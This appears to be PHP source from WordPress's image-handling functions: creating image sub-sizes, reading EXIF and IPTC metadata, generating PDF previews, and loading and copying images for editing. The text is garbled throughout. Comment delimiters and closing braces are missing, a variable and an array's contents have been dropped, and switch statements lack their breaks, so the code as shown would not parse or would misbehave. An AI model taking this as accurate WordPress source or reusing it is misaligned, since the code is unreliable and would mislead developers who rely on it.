 * Creates image sub-sizes, adds the new data to the image meta `sizes` array, and updates the image metadata.
 * Intended for use after an image is uploaded. Saves/updates the image metadata after each
 * sub-size is created. If there was an error, it is added to the returned image metadata array.
 * @since 5.3.0
 * @param string $file          Full path to the image file.
 * @param int    $attachment_id Attachment ID to process.
 * @return array The image attachment meta data.
function wp_create_image_subsizes( $file, $attachment_id ) {
	$imagesize = wp_getimagesize( $file );

	if ( empty( $imagesize ) ) {
		// File is not an image.
		return array();

	// Default image meta.
	$image_meta = array(
		'width'    => $imagesize[0],
		'height'   => $imagesize[1],
		'file'     => _wp_relative_upload_path( $file ),
		'filesize' => wp_filesize( $file ),
		'sizes'    => array(),

	// Fetch additional metadata from EXIF/IPTC.
	$exif_meta = wp_read_image_metadata( $file );

	if ( $exif_meta ) {
		$image_meta['image_meta'] = $exif_meta;

	// Do not scale (large) PNG images. May result in sub-sizes that have greater file size than the original. See #48736.
	if ( 'image/png' !== $imagesize['mime'] ) {

		 * Filters the "BIG image" threshold value.
		 * If the original image width or height is above the threshold, it will be scaled down. The threshold is
		 * used as max width and max height. The scaled down image will be used as the largest available size, including
		 * the `_wp_attached_file` post meta value.
		 * Returning `false` from the filter callback will disable the scaling.
		 * @since 5.3.0
		 * @param int    $threshold     The threshold value in pixels. Default 2560.
		 * @param array  $imagesize     {
		 *     Indexed array of the image width and height in pixels.
		 *     @type int $0 The image width.
		 *     @type int $1 The image height.
		 * }
		 * @param string $file          Full path to the uploaded image file.
		 * @param int    $attachment_id Attachment post ID.
		$threshold = (int) apply_filters( 'big_image_size_threshold', 2560, $imagesize, $file, $attachment_id );

		 * If the original image's dimensions are over the threshold,
		 * scale the image and use it as the "full" size.
		if ( $threshold && ( $image_meta['width'] > $threshold || $image_meta['height'] > $threshold ) ) {
			$editor = wp_get_image_editor( $file );

			if ( is_wp_error( $editor ) ) {
				// This image cannot be edited.
				return $image_meta;

			// Resize the image.
			$resized = $editor->resize( $threshold, $threshold );
			$rotated = null;

			// If there is EXIF data, rotate according to EXIF Orientation.
			if ( ! is_wp_error( $resized ) && is_array( $exif_meta ) ) {
				$resized = $editor->maybe_exif_rotate();
				$rotated = $resized;

			if ( ! is_wp_error( $resized ) ) {
				 * Append "-scaled" to the image file name. It will look like "my_image-scaled.jpg".
				 * This doesn't affect the sub-sizes names as they are generated from the original image (for best quality).
				$saved = $editor->save( $editor->generate_filename( 'scaled' ) );

				if ( ! is_wp_error( $saved ) ) {
					$image_meta = _wp_image_meta_replace_original( $saved, $file, $image_meta, $attachment_id );

					// If the image was rotated update the stored EXIF data.
					if ( true === $rotated && ! empty( $image_meta['image_meta']['orientation'] ) ) {
						$image_meta['image_meta']['orientation'] = 1;
				} else {
					// TODO: Log errors.
			} else {
				// TODO: Log errors.
		} elseif ( ! empty( $exif_meta['orientation'] ) && 1 !== (int) $exif_meta['orientation'] ) {
			// Rotate the whole original image if there is EXIF data and "orientation" is not 1.

			$editor = wp_get_image_editor( $file );

			if ( is_wp_error( $editor ) ) {
				// This image cannot be edited.
				return $image_meta;

			// Rotate the image.
			$rotated = $editor->maybe_exif_rotate();

			if ( true === $rotated ) {
				// Append `-rotated` to the image file name.
				$saved = $editor->save( $editor->generate_filename( 'rotated' ) );

				if ( ! is_wp_error( $saved ) ) {
					$image_meta = _wp_image_meta_replace_original( $saved, $file, $image_meta, $attachment_id );

					// Update the stored EXIF data.
					if ( ! empty( $image_meta['image_meta']['orientation'] ) ) {
						$image_meta['image_meta']['orientation'] = 1;
				} else {
					// TODO: Log errors.

	 * Initial save of the new metadata.
	 * At this point the file was uploaded and moved to the uploads directory
	 * but the image sub-sizes haven't been created yet and the `sizes` array is empty.
	wp_update_attachment_metadata( $attachment_id, $image_meta );

	$new_sizes = wp_get_registered_image_subsizes();

	 * Filters the image sizes automatically generated when uploading an image.
	 * @since 2.9.0
	 * @since 4.4.0 Added the `$image_meta` argument.
	 * @since 5.3.0 Added the `$attachment_id` argument.
	 * @param array $new_sizes     Associative array of image sizes to be created.
	 * @param array $image_meta    The image meta data: width, height, file, sizes, etc.
	 * @param int   $attachment_id The attachment post ID for the image.
	$new_sizes = apply_filters( 'intermediate_image_sizes_advanced', $new_sizes, $image_meta, $attachment_id );

	return _wp_make_subsizes( $new_sizes, $file, $image_meta, $attachment_id );

 * Low-level function to create image sub-sizes.
 * Updates the image meta after each sub-size is created.
 * Errors are stored in the returned image metadata array.
 * @since 5.3.0
 * @access private
 * @param array  $new_sizes     Array defining what sizes to create.
 * @param string $file          Full path to the image file.
 * @param array  $image_meta    The attachment meta data array.
 * @param int    $attachment_id Attachment ID to process.
 * @return array The attachment meta data with updated `sizes` array. Includes an array of errors encountered while resizing.
function _wp_make_subsizes( $new_sizes, $file, $image_meta, $attachment_id ) {
	if ( empty( $image_meta ) || ! is_array( $image_meta ) ) {
		// Not an image attachment.
		return array();

	// Check if any of the new sizes already exist.
	if ( isset( $image_meta['sizes'] ) && is_array( $image_meta['sizes'] ) ) {
		foreach ( $image_meta['sizes'] as $size_name => $size_meta ) {
			 * Only checks "size name" so we don't override existing images even if the dimensions
			 * don't match the currently defined size with the same name.
			 * To change the behavior, unset changed/mismatched sizes in the `sizes` array in image meta.
			if ( array_key_exists( $size_name, $new_sizes ) ) {
				unset( $new_sizes[ $size_name ] );
	} else {
		$image_meta['sizes'] = array();

	if ( empty( $new_sizes ) ) {
		// Nothing to do...
		return $image_meta;

	 * Sort the image sub-sizes in order of priority when creating them.
	 * This ensures there is an appropriate sub-size the user can access immediately
	 * even when there was an error and not all sub-sizes were created.
	$priority = array(
		'medium'       => null,
		'large'        => null,
		'thumbnail'    => null,
		'medium_large' => null,

	$new_sizes = array_filter( array_merge( $priority, $new_sizes ) );

	$editor = wp_get_image_editor( $file );

	if ( is_wp_error( $editor ) ) {
		// The image cannot be edited.
		return $image_meta;

	// If stored EXIF data exists, rotate the source image before creating sub-sizes.
	if ( ! empty( $image_meta['image_meta'] ) ) {
		$rotated = $editor->maybe_exif_rotate();

		if ( is_wp_error( $rotated ) ) {
			// TODO: Log errors.

	if ( method_exists( $editor, 'make_subsize' ) ) {
		foreach ( $new_sizes as $new_size_name => $new_size_data ) {
			$new_size_meta = $editor->make_subsize( $new_size_data );

			if ( is_wp_error( $new_size_meta ) ) {
				// TODO: Log errors.
			} else {
				// Save the size meta value.
				$image_meta['sizes'][ $new_size_name ] = $new_size_meta;
				wp_update_attachment_metadata( $attachment_id, $image_meta );
	} else {
		// Fall back to `$editor->multi_resize()`.
		$created_sizes = $editor->multi_resize( $new_sizes );

		if ( ! empty( $created_sizes ) ) {
			$image_meta['sizes'] = array_merge( $image_meta['sizes'], $created_sizes );
			wp_update_attachment_metadata( $attachment_id, $image_meta );

	return $image_meta;

 * Copy parent attachment properties to newly cropped image.
 * @since 6.5.0
 * @param string $cropped              Path to the cropped image file.
 * @param int    $parent_attachment_id Parent file Attachment ID.
 * @param string $context              Control calling the function.
 * @return array Properties of attachment.
function wp_copy_parent_attachment_properties( $cropped, $parent_attachment_id, $context = '' ) {
	$parent          = get_post( $parent_attachment_id );
	$parent_url      = wp_get_attachment_url( $parent->ID );
	$parent_basename = wp_basename( $parent_url );
	$url             = str_replace( wp_basename( $parent_url ), wp_basename( $cropped ), $parent_url );

	$size       = wp_getimagesize( $cropped );
	$image_type = $size ? $size['mime'] : 'image/jpeg';

	$sanitized_post_title = sanitize_file_name( $parent->post_title );
	$use_original_title   = (
		( '' !== trim( $parent->post_title ) ) &&
		 * Check if the original image has a title other than the "filename" default,
		 * meaning the image had a title when originally uploaded or its title was edited.
		( $parent_basename !== $sanitized_post_title ) &&
		( pathinfo( $parent_basename, PATHINFO_FILENAME ) !== $sanitized_post_title )
	$use_original_description = ( '' !== trim( $parent->post_content ) );

	$attachment = array(
		'post_title'     => $use_original_title ? $parent->post_title : wp_basename( $cropped ),
		'post_content'   => $use_original_description ? $parent->post_content : $url,
		'post_mime_type' => $image_type,
		'guid'           => $url,
		'context'        => $context,

	// Copy the image caption attribute (post_excerpt field) from the original image.
	if ( '' !== trim( $parent->post_excerpt ) ) {
		$attachment['post_excerpt'] = $parent->post_excerpt;

	// Copy the image alt text attribute from the original image.
	if ( '' !== trim( $parent->_wp_attachment_image_alt ) ) {
		$attachment['meta_input'] = array(
			'_wp_attachment_image_alt' => wp_slash( $parent->_wp_attachment_image_alt ),

	$attachment['post_parent'] = $parent_attachment_id;

	return $attachment;

 * Generates attachment meta data and create image sub-sizes for images.
 * @since 2.1.0
 * @since 6.0.0 The `$filesize` value was added to the returned array.
 * @param int    $attachment_id Attachment ID to process.
 * @param string $file          Filepath of the attached image.
 * @return array Metadata for attachment.
function wp_generate_attachment_metadata( $attachment_id, $file ) {
	$attachment = get_post( $attachment_id );

	$metadata  = array();
	$support   = false;
	$mime_type = get_post_mime_type( $attachment );

	if ( preg_match( '!^image/!', $mime_type ) && file_is_displayable_image( $file ) ) {
		// Make thumbnails and other intermediate sizes.
		$metadata = wp_create_image_subsizes( $file, $attachment_id );
	} elseif ( wp_attachment_is( 'video', $attachment ) ) {
		$metadata = wp_read_video_metadata( $file );
		$support  = current_theme_supports( 'post-thumbnails', 'attachment:video' ) || post_type_supports( 'attachment:video', 'thumbnail' );
	} elseif ( wp_attachment_is( 'audio', $attachment ) ) {
		$metadata = wp_read_audio_metadata( $file );
		$support  = current_theme_supports( 'post-thumbnails', 'attachment:audio' ) || post_type_supports( 'attachment:audio', 'thumbnail' );

	 * wp_read_video_metadata() and wp_read_audio_metadata() return `false`
	 * if the attachment does not exist in the local filesystem,
	 * so make sure to convert the value to an array.
	if ( ! is_array( $metadata ) ) {
		$metadata = array();

	if ( $support && ! empty( $metadata['image']['data'] ) ) {
		// Check for existing cover.
		$hash   = md5( $metadata['image']['data'] );
		$posts  = get_posts(
				'fields'         => 'ids',
				'post_type'      => 'attachment',
				'post_mime_type' => $metadata['image']['mime'],
				'post_status'    => 'inherit',
				'posts_per_page' => 1,
				'meta_key'       => '_cover_hash',
				'meta_value'     => $hash,
		$exists = reset( $posts );

		if ( ! empty( $exists ) ) {
			update_post_meta( $attachment_id, '_thumbnail_id', $exists );
		} else {
			$ext = '.jpg';
			switch ( $metadata['image']['mime'] ) {
				case 'image/gif':
					$ext = '.gif';
				case 'image/png':
					$ext = '.png';
				case 'image/webp':
					$ext = '.webp';
			$basename = str_replace( '.', '-', wp_basename( $file ) ) . '-image' . $ext;
			$uploaded = wp_upload_bits( $basename, '', $metadata['image']['data'] );
			if ( false === $uploaded['error'] ) {
				$image_attachment = array(
					'post_mime_type' => $metadata['image']['mime'],
					'post_type'      => 'attachment',
					'post_content'   => '',
				 * Filters the parameters for the attachment thumbnail creation.
				 * @since 3.9.0
				 * @param array $image_attachment An array of parameters to create the thumbnail.
				 * @param array $metadata         Current attachment metadata.
				 * @param array $uploaded         {
				 *     Information about the newly-uploaded file.
				 *     @type string $file  Filename of the newly-uploaded file.
				 *     @type string $url   URL of the uploaded file.
				 *     @type string $type  File type.
				 * }
				$image_attachment = apply_filters( 'attachment_thumbnail_args', $image_attachment, $metadata, $uploaded );

				$sub_attachment_id = wp_insert_attachment( $image_attachment, $uploaded['file'] );
				add_post_meta( $sub_attachment_id, '_cover_hash', $hash );
				$attach_data = wp_generate_attachment_metadata( $sub_attachment_id, $uploaded['file'] );
				wp_update_attachment_metadata( $sub_attachment_id, $attach_data );
				update_post_meta( $attachment_id, '_thumbnail_id', $sub_attachment_id );
	} elseif ( 'application/pdf' === $mime_type ) {
		// Try to create image thumbnails for PDFs.

		$fallback_sizes = array(

		 * Filters the image sizes generated for non-image mime types.
		 * @since 4.7.0
		 * @param string[] $fallback_sizes An array of image size names.
		 * @param array    $metadata       Current attachment metadata.
		$fallback_sizes = apply_filters( 'fallback_intermediate_image_sizes', $fallback_sizes, $metadata );

		$registered_sizes = wp_get_registered_image_subsizes();
		$merged_sizes     = array_intersect_key( $registered_sizes, array_flip( $fallback_sizes ) );

		// Force thumbnails to be soft crops.
		if ( isset( $merged_sizes['thumbnail'] ) && is_array( $merged_sizes['thumbnail'] ) ) {
			$merged_sizes['thumbnail']['crop'] = false;

		// Only load PDFs in an image editor if we're processing sizes.
		if ( ! empty( $merged_sizes ) ) {
			$editor = wp_get_image_editor( $file );

			if ( ! is_wp_error( $editor ) ) { // No support for this type of file.
				 * PDFs may have the same file filename as JPEGs.
				 * Ensure the PDF preview image does not overwrite any JPEG images that already exist.
				$dirname      = dirname( $file ) . '/';
				$ext          = '.' . pathinfo( $file, PATHINFO_EXTENSION );
				$preview_file = $dirname . wp_unique_filename( $dirname, wp_basename( $file, $ext ) . '-pdf.jpg' );

				$uploaded = $editor->save( $preview_file, 'image/jpeg' );
				unset( $editor );

				// Resize based on the full size image, rather than the source.
				if ( ! is_wp_error( $uploaded ) ) {
					$image_file = $uploaded['path'];
					unset( $uploaded['path'] );

					$metadata['sizes'] = array(
						'full' => $uploaded,

					// Save the meta data before any image post-processing errors could happen.
					wp_update_attachment_metadata( $attachment_id, $metadata );

					// Create sub-sizes saving the image meta after each.
					$metadata = _wp_make_subsizes( $merged_sizes, $image_file, $metadata, $attachment_id );

	// Remove the blob of binary data from the array.
	unset( $metadata['image']['data'] );

	// Capture file size for cases where it has not been captured yet, such as PDFs.
	if ( ! isset( $metadata['filesize'] ) && file_exists( $file ) ) {
		$metadata['filesize'] = wp_filesize( $file );

	 * Filters the generated attachment meta data.
	 * @since 2.1.0
	 * @since 5.3.0 The `$context` parameter was added.
	 * @param array  $metadata      An array of attachment meta data.
	 * @param int    $attachment_id Current attachment ID.
	 * @param string $context       Additional context. Can be 'create' when metadata was initially created for new attachment
	 *                              or 'update' when the metadata was updated.
	return apply_filters( 'wp_generate_attachment_metadata', $metadata, $attachment_id, 'create' );

 * Converts a fraction string to a decimal.
 * @since 2.5.0
 * @param string $str Fraction string.
 * @return int|float Returns calculated fraction or integer 0 on invalid input.
function wp_exif_frac2dec( $str ) {
	if ( ! is_scalar( $str ) || is_bool( $str ) ) {
		return 0;

	if ( ! is_string( $str ) ) {
		return $str; // This can only be an integer or float, so this is fine.

	// Fractions passed as a string must contain a single `/`.
	if ( substr_count( $str, '/' ) !== 1 ) {
		if ( is_numeric( $str ) ) {
			return (float) $str;

		return 0;

	list( $numerator, $denominator ) = explode( '/', $str );

	// Both the numerator and the denominator must be numbers.
	if ( ! is_numeric( $numerator ) || ! is_numeric( $denominator ) ) {
		return 0;

	// The denominator must not be zero.
	if ( 0 == $denominator ) { // phpcs:ignore Universal.Operators.StrictComparisons.LooseEqual -- Deliberate loose comparison.
		return 0;

	return $numerator / $denominator;

 * Converts the exif date format to a unix timestamp.
 * @since 2.5.0
 * @param string $str A date string expected to be in Exif format (Y:m:d H:i:s).
 * @return int|false The unix timestamp, or false on failure.
function wp_exif_date2ts( $str ) {
	list( $date, $time ) = explode( ' ', trim( $str ) );
	list( $y, $m, $d )   = explode( ':', $date );

	return strtotime( "{$y}-{$m}-{$d} {$time}" );

 * Gets extended image metadata, exif or iptc as available.
 * Retrieves the EXIF metadata aperture, credit, camera, caption, copyright, iso
 * created_timestamp, focal_length, shutter_speed, and title.
 * The IPTC metadata that is retrieved is APP13, credit, byline, created date
 * and time, caption, copyright, and title. Also includes FNumber, Model,
 * DateTimeDigitized, FocalLength, ISOSpeedRatings, and ExposureTime.
 * @todo Try other exif libraries if available.
 * @since 2.5.0
 * @param string $file
 * @return array|false Image metadata array on success, false on failure.
function wp_read_image_metadata( $file ) {
	if ( ! file_exists( $file ) ) {
		return false;

	list( , , $image_type ) = wp_getimagesize( $file );

	 * EXIF contains a bunch of data we'll probably never need formatted in ways
	 * that are difficult to use. We'll normalize it and just extract the fields
	 * that are likely to be useful. Fractions and numbers are converted to
	 * floats, dates to unix timestamps, and everything else to strings.
	$meta = array(
		'aperture'          => 0,
		'credit'            => '',
		'camera'            => '',
		'caption'           => '',
		'created_timestamp' => 0,
		'copyright'         => '',
		'focal_length'      => 0,
		'iso'               => 0,
		'shutter_speed'     => 0,
		'title'             => '',
		'orientation'       => 0,
		'keywords'          => array(),

	$iptc = array();
	$info = array();
	 * Read IPTC first, since it might contain data not available in exif such
	 * as caption, description etc.
	if ( is_callable( 'iptcparse' ) ) {
		wp_getimagesize( $file, $info );

		if ( ! empty( $info['APP13'] ) ) {
			// Don't silence errors when in debug mode, unless running unit tests.
			if ( defined( 'WP_DEBUG' ) && WP_DEBUG
				&& ! defined( 'WP_RUN_CORE_TESTS' )
			) {
				$iptc = iptcparse( $info['APP13'] );
			} else {
				// Silencing notice and warning is intentional. See https://core.trac.wordpress.org/ticket/42480
				$iptc = @iptcparse( $info['APP13'] );

			if ( ! is_array( $iptc ) ) {
				$iptc = array();

			// Headline, "A brief synopsis of the caption".
			if ( ! empty( $iptc['2#105'][0] ) ) {
				$meta['title'] = trim( $iptc['2#105'][0] );
				* Title, "Many use the Title field to store the filename of the image,
				* though the field may be used in many ways".
			} elseif ( ! empty( $iptc['2#005'][0] ) ) {
				$meta['title'] = trim( $iptc['2#005'][0] );

			if ( ! empty( $iptc['2#120'][0] ) ) { // Description / legacy caption.
				$caption = trim( $iptc['2#120'][0] );

				$caption_length = strlen( $caption );

				if ( empty( $meta['title'] ) && $caption_length < 80 ) {
					// Assume the title is stored in 2:120 if it's short.
					$meta['title'] = $caption;

				$meta['caption'] = $caption;

			if ( ! empty( $iptc['2#110'][0] ) ) { // Credit.
				$meta['credit'] = trim( $iptc['2#110'][0] );
			} elseif ( ! empty( $iptc['2#080'][0] ) ) { // Creator / legacy byline.
				$meta['credit'] = trim( $iptc['2#080'][0] );

			if ( ! empty( $iptc['2#055'][0] ) && ! empty( $iptc['2#060'][0] ) ) { // Created date and time.
				$meta['created_timestamp'] = strtotime( $iptc['2#055'][0] . ' ' . $iptc['2#060'][0] );

			if ( ! empty( $iptc['2#116'][0] ) ) { // Copyright.
				$meta['copyright'] = trim( $iptc['2#116'][0] );

			if ( ! empty( $iptc['2#025'][0] ) ) { // Keywords array.
				$meta['keywords'] = array_values( $iptc['2#025'] );

	$exif = array();

	 * Filters the image types to check for exif data.
	 * @since 2.5.0
	 * @param int[] $image_types Array of image types to check for exif data. Each value
	 *                           is usually one of the `IMAGETYPE_*` constants.
	$exif_image_types = apply_filters( 'wp_read_image_metadata_types', array( IMAGETYPE_JPEG, IMAGETYPE_TIFF_II, IMAGETYPE_TIFF_MM ) );

	if ( is_callable( 'exif_read_data' ) && in_array( $image_type, $exif_image_types, true ) ) {
		// Don't silence errors when in debug mode, unless running unit tests.
		if ( defined( 'WP_DEBUG' ) && WP_DEBUG
			&& ! defined( 'WP_RUN_CORE_TESTS' )
		) {
			$exif = exif_read_data( $file );
		} else {
			// Silencing notice and warning is intentional. See https://core.trac.wordpress.org/ticket/42480
			$exif = @exif_read_data( $file );

		if ( ! is_array( $exif ) ) {
			$exif = array();

		$exif_description = '';
		$exif_usercomment = '';
		if ( ! empty( $exif['ImageDescription'] ) ) {
			$exif_description = trim( $exif['ImageDescription'] );

		if ( ! empty( $exif['COMPUTED']['UserComment'] ) ) {
			$exif_usercomment = trim( $exif['COMPUTED']['UserComment'] );

		if ( $exif_description ) {
			$description_length = strlen( $exif_description );
			if ( empty( $meta['title'] ) && $description_length < 80 ) {
				// Assume the title is stored in ImageDescription.
				$meta['title'] = $exif_description;

			// If both user comments and description are present.
			if ( empty( $meta['caption'] ) && $exif_description && $exif_usercomment ) {
				if ( ! empty( $meta['title'] ) && $exif_description === $meta['title'] ) {
					$caption = $exif_usercomment;
				} else {
					if ( $exif_description === $exif_usercomment ) {
						$caption = $exif_description;
					} else {
						$caption = trim( $exif_description . ' ' . $exif_usercomment );
				$meta['caption'] = $caption;

			if ( empty( $meta['caption'] ) && $exif_usercomment ) {
				$meta['caption'] = $exif_usercomment;

			if ( empty( $meta['caption'] ) ) {
				$meta['caption'] = $exif_description;
		} elseif ( empty( $meta['caption'] ) && $exif_usercomment ) {
			$meta['caption']    = $exif_usercomment;
			$description_length = strlen( $exif_usercomment );
			if ( empty( $meta['title'] ) && $description_length < 80 ) {
				$meta['title'] = trim( $exif_usercomment );
		} elseif ( empty( $meta['caption'] ) && ! empty( $exif['Comments'] ) ) {
			$meta['caption'] = trim( $exif['Comments'] );

		if ( empty( $meta['credit'] ) ) {
			if ( ! empty( $exif['Artist'] ) ) {
				$meta['credit'] = trim( $exif['Artist'] );
			} elseif ( ! empty( $exif['Author'] ) ) {
				$meta['credit'] = trim( $exif['Author'] );

		if ( empty( $meta['copyright'] ) && ! empty( $exif['Copyright'] ) ) {
			$meta['copyright'] = trim( $exif['Copyright'] );
		if ( ! empty( $exif['FNumber'] ) && is_scalar( $exif['FNumber'] ) ) {
			$meta['aperture'] = round( wp_exif_frac2dec( $exif['FNumber'] ), 2 );
		if ( ! empty( $exif['Model'] ) ) {
			$meta['camera'] = trim( $exif['Model'] );
		if ( empty( $meta['created_timestamp'] ) && ! empty( $exif['DateTimeDigitized'] ) ) {
			$meta['created_timestamp'] = wp_exif_date2ts( $exif['DateTimeDigitized'] );
		if ( ! empty( $exif['FocalLength'] ) ) {
			$meta['focal_length'] = (string) $exif['FocalLength'];
			if ( is_scalar( $exif['FocalLength'] ) ) {
				$meta['focal_length'] = (string) wp_exif_frac2dec( $exif['FocalLength'] );
		if ( ! empty( $exif['ISOSpeedRatings'] ) ) {
			$meta['iso'] = is_array( $exif['ISOSpeedRatings'] ) ? reset( $exif['ISOSpeedRatings'] ) : $exif['ISOSpeedRatings'];
			$meta['iso'] = trim( $meta['iso'] );
		if ( ! empty( $exif['ExposureTime'] ) ) {
			$meta['shutter_speed'] = (string) $exif['ExposureTime'];
			if ( is_scalar( $exif['ExposureTime'] ) ) {
				$meta['shutter_speed'] = (string) wp_exif_frac2dec( $exif['ExposureTime'] );
		if ( ! empty( $exif['Orientation'] ) ) {
			$meta['orientation'] = $exif['Orientation'];

	foreach ( array( 'title', 'caption', 'credit', 'copyright', 'camera', 'iso' ) as $key ) {
		if ( $meta[ $key ] && ! seems_utf8( $meta[ $key ] ) ) {
			$meta[ $key ] = utf8_encode( $meta[ $key ] );

	foreach ( $meta['keywords'] as $key => $keyword ) {
		if ( ! seems_utf8( $keyword ) ) {
			$meta['keywords'][ $key ] = utf8_encode( $keyword );

	$meta = wp_kses_post_deep( $meta );

	 * Filters the array of meta data read from an image's exif data.
	 * @since 2.5.0
	 * @since 4.4.0 The `$iptc` parameter was added.
	 * @since 5.0.0 The `$exif` parameter was added.
	 * @param array  $meta       Image meta data.
	 * @param string $file       Path to image file.
	 * @param int    $image_type Type of image, one of the `IMAGETYPE_XXX` constants.
	 * @param array  $iptc       IPTC data.
	 * @param array  $exif       EXIF data.
	return apply_filters( 'wp_read_image_metadata', $meta, $file, $image_type, $iptc, $exif );

 * Validates that file is an image.
 * @since 2.5.0
 * @param string $path File path to test if valid image.
 * @return bool True if valid image, false if not valid image.
function file_is_valid_image( $path ) {
	$size = wp_getimagesize( $path );
	return ! empty( $size );

 * Validates that file is suitable for displaying within a web page.
 * @since 2.5.0
 * @param string $path File path to test.
 * @return bool True if suitable, false if not suitable.
function file_is_displayable_image( $path ) {

	$info = wp_getimagesize( $path );
	if ( empty( $info ) ) {
		$result = false;
	} elseif ( ! in_array( $info[2], $displayable_image_types, true ) ) {
		$result = false;
	} else {
		$result = true;

	 * Filters whether the current image is displayable in the browser.
	 * @since 2.5.0
	 * @param bool   $result Whether the image can be displayed. Default true.
	 * @param string $path   Path to the image.
	return apply_filters( 'file_is_displayable_image', $result, $path );

 * Loads an image resource for editing.
 * @since 2.9.0
 * @param int          $attachment_id Attachment ID.
 * @param string       $mime_type     Image mime type.
 * @param string|int[] $size          Optional. Image size. Accepts any registered image size name, or an array
 *                                    of width and height values in pixels (in that order). Default 'full'.
 * @return resource|GdImage|false The resulting image resource or GdImage instance on success,
 *                                false on failure.
function load_image_to_edit( $attachment_id, $mime_type, $size = 'full' ) {
	$filepath = _load_image_to_edit_path( $attachment_id, $size );
	if ( empty( $filepath ) ) {
		return false;

	switch ( $mime_type ) {
		case 'image/jpeg':
			$image = imagecreatefromjpeg( $filepath );
		case 'image/png':
			$image = imagecreatefrompng( $filepath );
		case 'image/gif':
			$image = imagecreatefromgif( $filepath );
		case 'image/webp':
			$image = false;
			if ( function_exists( 'imagecreatefromwebp' ) ) {
				$image = imagecreatefromwebp( $filepath );
			$image = false;

	if ( is_gd_image( $image ) ) {
		 * Filters the current image being loaded for editing.
		 * @since 2.9.0
		 * @param resource|GdImage $image         Current image.
		 * @param int              $attachment_id Attachment ID.
		 * @param string|int[]     $size          Requested image size. Can be any registered image size name, or
		 *                                        an array of width and height values in pixels (in that order).
		$image = apply_filters( 'load_image_to_edit', $image, $attachment_id, $size );

		if ( function_exists( 'imagealphablending' ) && function_exists( 'imagesavealpha' ) ) {
			imagealphablending( $image, false );
			imagesavealpha( $image, true );

	return $image;

 * Retrieves the path or URL of an attachment's attached file.
 * If the attached file is not present on the local filesystem (usually due to replication plugins),
 * then the URL of the file is returned if `allow_url_fopen` is supported.
 * @since 3.4.0
 * @access private
 * @param int          $attachment_id Attachment ID.
 * @param string|int[] $size          Optional. Image size. Accepts any registered image size name, or an array
 *                                    of width and height values in pixels (in that order). Default 'full'.
 * @return string|false File path or URL on success, false on failure.
function _load_image_to_edit_path( $attachment_id, $size = 'full' ) {
	$filepath = get_attached_file( $attachment_id );

	if ( $filepath && file_exists( $filepath ) ) {
		if ( 'full' !== $size ) {
			$data = image_get_intermediate_size( $attachment_id, $size );

			if ( $data ) {
				$filepath = path_join( dirname( $filepath ), $data['file'] );

				 * Filters the path to an attachment's file when editing the image.
				 * The filter is evaluated for all image sizes except 'full'.
				 * @since 3.1.0
				 * @param string       $path          Path to the current image.
				 * @param int          $attachment_id Attachment ID.
				 * @param string|int[] $size          Requested image size. Can be any registered image size name, or
				 *                                    an array of width and height values in pixels (in that order).
				$filepath = apply_filters( 'load_image_to_edit_filesystempath', $filepath, $attachment_id, $size );
	} elseif ( function_exists( 'fopen' ) && ini_get( 'allow_url_fopen' ) ) {
		 * Filters the path to an attachment's URL when editing the image.
		 * The filter is only evaluated if the file isn't stored locally and `allow_url_fopen` is enabled on the server.
		 * @since 3.1.0
		 * @param string|false $image_url     Current image URL.
		 * @param int          $attachment_id Attachment ID.
		 * @param string|int[] $size          Requested image size. Can be any registered image size name, or
		 *                                    an array of width and height values in pixels (in that order).
		$filepath = apply_filters( 'load_image_to_edit_attachmenturl', wp_get_attachment_url( $attachment_id ), $attachment_id, $size );

	 * Filters the returned path or URL of the current image.
	 * @since 2.9.0
	 * @param string|false $filepath      File path or URL to current image, or false.
	 * @param int          $attachment_id Attachment ID.
	 * @param string|int[] $size          Requested image size. Can be any registered image size name, or
	 *                                    an array of width and height values in pixels (in that order).
	return apply_filters( 'load_image_to_edit_path', $filepath, $attachment_id, $size );

 * Copies an existing image file.
 * @since 3.4.0
 * @access private
 * @param int $attachment_id Attachment ID.
 * @return string|false New file path on success, false on failure.
function _copy_image_file( $attachment_id ) {
	$dst_file = get_attached_file( $attachment_id );
	$src_file = $dst_file;

	if ( ! file_exists( $src_file ) ) {
		$src_file = _load_image_to_edit_path( $attachment_id );

	if ( $src_file ) {
		$dst_file = str_replace( wp_basename( $dst_file ), 'copy-' . wp_basename( $dst_file ), $dst_file );
		$dst_file = dirname( $dst_file ) . '/' . wp_unique_filename( dirname( $dst_file ), wp_basename( $dst_file ) );

		 * The directory containing the original file may no longer
		 * exist when using a replication plugin.
		wp_mkdir_p( dirname( $dst_file ) );

		if ( ! copy( $src_file, $dst_file ) ) {
			$dst_file = false;
	} else {
		$dst_file = false;

	return $dst_file;


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